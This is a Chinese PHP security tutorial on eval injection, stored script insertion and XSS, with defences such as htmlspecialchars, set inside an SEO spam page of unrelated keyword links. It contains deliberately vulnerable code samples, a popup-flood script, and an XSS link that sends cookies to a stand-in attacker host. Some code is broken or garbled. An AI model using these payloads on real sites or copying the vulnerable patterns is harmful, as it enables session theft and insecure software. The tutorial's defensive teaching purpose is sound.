设计师就业网站_深圳四星建设网_甘孜网站建设公司_宿迁有自己网站 PHP 漏洞全解(二)-Eval注入攻击
eval 注入攻击
    eval 函数将输入的字符串参数当作 PHP 程序代码来执行
    函数原型:
    mixed eval(string code_str) //eval 注入一般发生在攻击者能控制输入的字符串的时候
        //ex2.php
        <?php
        $var = "var";
        if (isset($_GET["arg"])){
            $arg = $_GET["arg"];
            eval("$var = $arg;");
            echo "$var =".$var;
        }
        ?>
    当我们提交 http://www.sectop.com/ex2.php?arg=phpinfo();漏洞就产生了
    动态函数
        <?php
        func A(){
            dosomething();
        }
        func B(){
            dosomething();
        }
        if (isset($_GET["func"])){
            $myfunc = $_GET["func"];
            echo $myfunc();
        }
        ?>
    程序员原意是想动态调用 A 和 B 函数, 那我们提交http://www.sectop.com/ex.php?func=phpinfo 漏洞产生
防范方法
    1、尽量不要执行外部命令
    2、使用自定义函数或函数库来替代外部命令的功能
    3、使用 escapeshellarg 函数来处理命令参数
    4、使用 safe_mode_exec_dir 指定可执行文件的路径
    esacpeshellarg 函数会将任何引起参数或命令结束的字符转义,单引号“'”,替换成“\'”,双引号“"”,替换成“\"”,分号“;”替换成“\;”
    用 safe_mode_exec_dir 指定可执行文件的路径,可以把会使用的命令提前放入此路径内safe_mode = On
    safe_mode_exec_di r= /usr/local/php/bin/


PHP 漏洞全解(三)-客户端脚本植入
客户端脚本植入(Script Insertion),是指将可以执行的脚本插入到表单、图片、动画或超链接文字等对象内。当用户打开这些对象后,攻击者所植入的脚本就会被执行,进而开始攻击。
可以被用作脚本植入的 HTML 标签一般包括以下几种:
    1、<script>标签标记的 javascript 和 vbscript 等页面脚本程序。在<script>标签内可以指定 js程序代码,也可以在 src 属性内指定 js 文件的 URL 路径
    2、<object>标签标记的对象。这些对象是 java applet、多媒体文件和 ActiveX 控件等。通常在 data 属性内指定对象的 URL 路径
    3、<embed>标签标记的对象。这些对象是多媒体文件,例如:swf 文件。通常在 src 属性内指定对象的 URL 路径
    4、<applet>标签标记的对象。这些对象是 java applet,通常在 codebase 属性内指定对象的 URL路径
    5、<form>标签标记的对象。通常在 action 属性内指定要处理表单数据的 web 应用程序的URL路径
客户端脚本植入的攻击步骤
    1、攻击者注册普通用户后登陆网站
    2、打开留言页面,插入攻击的 js 代码
    3、其他用户登录网站(包括管理员),浏览此留言的内容
    4、隐藏在留言内容中的 js 代码被执行,攻击成功
实例
    数据库
    CREATE TABLE `postmessage` (
    ìdìnt(11) NOT NULL auto_increment,
    `subject` varchar(60) NOT NULL default '',
    `name` varchar(40) NOT NULL default '',
    èmail` varchar(25) NOT NULL default '',
    `question` mediumtext NOT NULL,
    `postdate` datetime NOT NULL default '0000-00-00 00:00:00',
    PRIMARY KEY (ìd`)
    ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=' 使用者的留言' AUTO_INCREMENT=69 ;
    //add.php 插入留言
    //list.php 留言列表
    //show.php 显示留言
    浏览此留言的时候会执行 js 脚本
    插入<script>while(1){windows.open();}</script> 无限弹框
    插入<script>location.href="http://www.sectop.com";</script> 跳转钓鱼页面
    或者使用其他自行构造的 js 代码进行攻击
防范的方法
    一般使用 htmlspecialchars 函数来将特殊字符转换成 HTML 编码
    函数原型
        string htmlspecialchars (string string, int quote_style, string charset)
        string 是要编码的字符串
        quote_style 可选, 值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES ,默认值ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES,表示双引号和单引号都要转换。ENT_NOQUOTES,表示双引号和单引号都不转换
        charset 可选,表示使用的字符集
        函数会将下列特殊字符转换成 html 编码:
        & ----> &amp;
        " ----> &quot;
        ' ----> &#039;
        < ----> &lt;
        > ----> &gt;
把 show.php 的第 98 行改成<?php echo htmlspecialchars(nl2br($row['question']), ENT_QUOTES); ?>然后再查看插入 js 的漏洞页面


PHP 漏洞全解(四)-xss 跨站脚本攻击
XSS(Cross Site Scripting),意为跨网站脚本攻击,为了和样式表 css(Cascading StyleSheet)区别,缩写为 XSS
跨站脚本主要被攻击者利用来读取网站用户的 cookies 或者其他个人数据,一旦攻击者得到这些数据,那么他就可以伪装成此用户来登录网站,获得此用户的权限。
跨站脚本攻击的一般步骤:
    1、攻击者以某种方式发送 xss 的 http 链接给目标用户
    2、目标用户登录此网站,在登陆期间打开了攻击者发送的 xss 链接
    3、网站执行了此 xss 攻击脚本
    4、目标用户页面跳转到攻击者的网站,攻击者取得了目标用户的信息
    5、攻击者使用目标用户的信息登录网站,完成攻击
当有存在跨站漏洞的程序出现的时候, 攻击者可以构造类似
http://www.sectop.com/search.php?key=<script>document.location='http://www.hack.com/getcookie.php?cookie='+document.cookie;</script>,诱骗用户点击后,可以获取用户 cookies值
防范方法:
    利用 htmlspecialchars 函数将特殊字符转换成 HTML 编码
函数原型
    string htmlspecialchars (string string, int quote_style, string charset)
    string 是要编码的字符串
    quote_style 可选, 值可为 ENT_COMPAT、ENT_QUOTES 、ENT_NOQUOTES ,默认值ENT_COMPAT,表示只转换双引号不转换单引号。ENT_QUOTES ,表示双引号和单引号都
要转换。ENT_NOQUOTES ,表示双引号和单引号都不转换
    charset 可选,表示使用的字符集
    函数会将下列特殊字符转换成 html 编码:
    & ----> &amp;
    " ----> &quot;
    ' ----> &#039;
    < ----> &lt;
    > ----> &gt;
$_SERVER["PHP_SELF"]变量的跨站
    在某个表单中,如果提交参数给自己,会用这样的语句
    <form action="<?php echo $_SERVER["PHP_SELF"];?>" method="POST">
    ......
    </form>
    $_SERVER["PHP_SELF"]变量的值为当前页面名称
    例:
    http://www.sectop.com/get.php
    get.php 中上述的表单
    那么我们提交
    http://www.sectop.com/get.php/"><script>alert(document.cookie);</script>
    那么表单变成
    <form action="get.php/"><script>alert(document.cookie);</script>" method="POST">
    跨站脚本被插进去了
防御方法还是使用 htmlspecialchars 过滤输出的变量,或者提交给自身文件的表单使用
    <form action="" method="post">
    这样直接避免了$_SERVER["PHP_SELF"]变量被跨站


PHP 漏洞全解(五)-SQL 注入攻击

">

深圳福田龙岗龙华

海伦堡房地产最新消息、qq推广营销、永久使用、不限域名、山东东营信息网官网

厦门营销网站建设?

设计师就业网站_深圳四星建设网_甘孜网站建设公司_宿迁有自己网站

宁波最好的seo外包站群工具马蹄室内设计论坛官网深圳专业制作证件火鸟门户官方网站客服咨询设计是什么网站模板下载html完整的网页设计案例北京建设网证书查询平台东莞关键词seo优化html教程 千锋教育mobiletrain企点qq下载10个免费的ppt模板网站产品宣传推广策划个人不动产网上查询源码下载平台自己制作一个app需要多少钱企业网站建设须知企业建立电子商务网站的目的是公司网站服务宁波seo优化案例免费代理ip国外学平面设计哪里有正规机构深圳市住房和建设局网站首页陕西省建设工程招标信息网商店小程序免费制作平台电商平台图片儋州网站建设公司网站优化策略分析软件定制开发标准杭州网络安全研究所

猜你喜欢

  • 友情链接:
  • 学网页设计要学多久 郑州气象站建站时间 建筑企业查询网站 个人网页欣赏 模拟功能性开发的网站多少钱 网站如何做成小程序